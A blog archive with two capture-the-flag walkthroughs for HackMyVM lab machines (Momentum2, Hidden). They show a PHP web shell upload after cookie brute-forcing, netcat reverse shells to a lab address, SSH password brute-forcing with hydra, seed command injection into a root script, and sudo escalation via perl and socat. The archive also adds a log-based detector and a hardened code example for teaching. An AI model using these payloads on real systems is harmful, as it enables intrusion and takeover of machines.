Daily archive: May 31, 2021

HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99 -oN ports.log
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. To upload a .php file we need the right admin cookie and a secure parameter; without them only .txt uploads are accepted.

 cat ajax.php.bak
     //The boss told me to add one more Upper Case letter at the end of the cookie
     if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
         //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
     }
     else{
         $valid_ext = array("txt");
     }
     // Remember success upload returns 1

Generate a dictionary of candidate cookies: the comment says one more upper-case letter was appended, so append each letter A-Z to the known value.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php containing a minimal PHP web shell.

 cat cmd.php
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with Burp Suite.

[image-20210531210127178.png]

Send the request to Repeater, add a cookie "admin=xxx" (we will brute-force its value next), and add the parameter "secure=val1d". Take care: the value is val1d with a digit one, not valid. If we click Send now, the response body is 0, which means the upload failed.

[image-20210531212540903.png]

Then send it to Intruder and mark the cookie value as the payload position: admin=§xxxxx§.

[image-20210531213130392.png]

Set the payload list to the cookie.txt we just generated.

[image-20210531213158667.png]

Click Start attack. The right cookie is the one whose response body is 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check that cmd.php works.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get a reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
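From the defender's side, as an added example that is not part of the original walkthrough: a small detector run over constructed Apache access-log lines that flags the two traces the steps above leave behind, a burst of POSTs to /ajax.php from one address (the Intruder run) and a .php file being requested under /owls/. The burst threshold and the log lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
UPLOAD_ENDPOINT = "/ajax.php"   # upload handler seen in the walkthrough
UPLOAD_DIR = "/owls/"           # directory the uploaded file landed in
BURST = 10                      # POSTs per IP per minute before alerting (assumed threshold)
WINDOW = timedelta(minutes=1)

def parse(line):
    """Parse one Apache combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["path"] = e["path"].split("?", 1)[0]   # drop the query string
    return e

def detect(lines):
    """Return (kind, ip, detail) alerts: POST bursts at the upload handler, and PHP under the upload dir."""
    events = [e for e in map(parse, lines) if e]
    alerts, posts = [], defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"] == UPLOAD_ENDPOINT:
            posts[e["ip"]].append(e["ts"])
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):            # sliding one-minute window
            while times[end] - times[start] > WINDOW:
                start += 1
            if end - start + 1 >= BURST:
                alerts.append(("upload_bruteforce", ip, f"{end - start + 1} POSTs in {WINDOW}"))
                break
    for e in events:
        if e["path"].startswith(UPLOAD_DIR) and e["path"].endswith(".php"):
            alerts.append(("php_in_upload_dir", e["ip"], e["path"]))
    return alerts

def sample_log():
    """Constructed lines: 26 cookie guesses against /ajax.php, the web shell call, one benign hit."""
    lines = [f'192.168.56.150 - - [31/May/2021:21:33:{i:02d} +0800] "POST /ajax.php HTTP/1.1" 200 1 "-" "Mozilla/5.0"'
             for i in range(26)]
    lines.append('192.168.56.150 - - [31/May/2021:21:34:02 +0800] "GET /owls/cmd.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.74.0"')
    lines.append('192.168.56.1 - - [31/May/2021:21:34:10 +0800] "GET /index.html HTTP/1.1" 200 1428 "-" "Mozilla/5.0"')
    return lines
```

Both alerts fire on the constructed sample; the benign request to /index.html alone produces none.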

In athena's home folder we find a password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

The asterisk stands for one unknown character, so we generate a dictionary with crunch, one run per character class (@ lower case, % digits, , upper case, ^ symbols).

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt
```

Brute-force SSH with the username athena and this dictionary.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*


SSH in as athena and check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py


Run the script with sudo. When it asks for the seed, enter a command instead: the seed evidently reaches a shell unsanitized, so the ;-separated command runs as root.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;


Listen on that port in another terminal and we get a root shell.

nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)
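As an added example (not the machine's own cookie-gen.py, whose source the walkthrough does not show), a minimal reproduction of the shell-interpolation pattern that matches the behaviour above, beside a hardened version that validates the seed, logs refusals, and never touches a shell. The printf command and the sha256 derivation are assumptions.

```python
import hashlib
import re
import subprocess

# Conservative seed alphabet; anything else is refused before any processing happens.
SEED_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

def vulnerable_cookie(seed):
    """Anti-pattern consistent with what the box did (assumed; the real script is not shown).
    The seed is interpolated into a shell command string, so a ';' ends the intended command
    and starts another one, running as the invoking user (root under the sudo rule).
    Returns (what the shell actually printed, derived cookie)."""
    printed = subprocess.run(f"printf %s {seed}", shell=True,
                             capture_output=True, text=True).stdout
    return printed, hashlib.sha256(printed.encode()).hexdigest()

def safe_cookie(seed, audit_log):
    """Hardened version: allow-list the seed, record rejections (the script's banner says seeds
    are logged, so refusals should be too), and derive the cookie without any shell."""
    if not SEED_RE.fullmatch(seed):
        audit_log.append(f"rejected seed: {seed!r}")
        raise ValueError("seed must be 1-64 characters from [A-Za-z0-9_-]")
    # Hashing needs no subprocess at all. If an external tool were genuinely required,
    # pass an argv list with shell=False so the seed is one argument and is never re-parsed.
    return hashlib.sha256(seed.encode()).hexdigest()

if __name__ == "__main__":
    print(vulnerable_cookie("abc; echo INJECTED")[0])   # the injected echo runs
    log = []
    try:
        safe_cookie("abc; echo INJECTED", log)
    except ValueError as exc:
        print(exc, log)
```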

HackMyVm Hidden Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99 -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log
 /index.html           (Status: 200) [Size: 392]

Check index.html: it contains a PNG and a hint about the format.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The PNG is a tic-tac-toe cipher. Decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts and scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

loot.php returns an empty page, so fuzz its parameter name.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"  

Confirm the RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get a reverse shell as www-data.

curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get a shell as toreto through the perl rule.

 www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Fetch our id_rsa.pub into /home/toreto/.ssh as authorized_keys and chmod it to 600.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
```


Then log in over SSH as toreto.

ssh toreto@192.168.56.99
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

[ASCII-art banner: Hack_MyVM - Hidden]

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$


In /home/atenea/.hidden we find a wordlist; it is owned by toreto, which is why we can read it.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt


Brute-force atenea's SSH password with that list.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Log in as atenea and check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat


Get a root shell through the socat rule.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden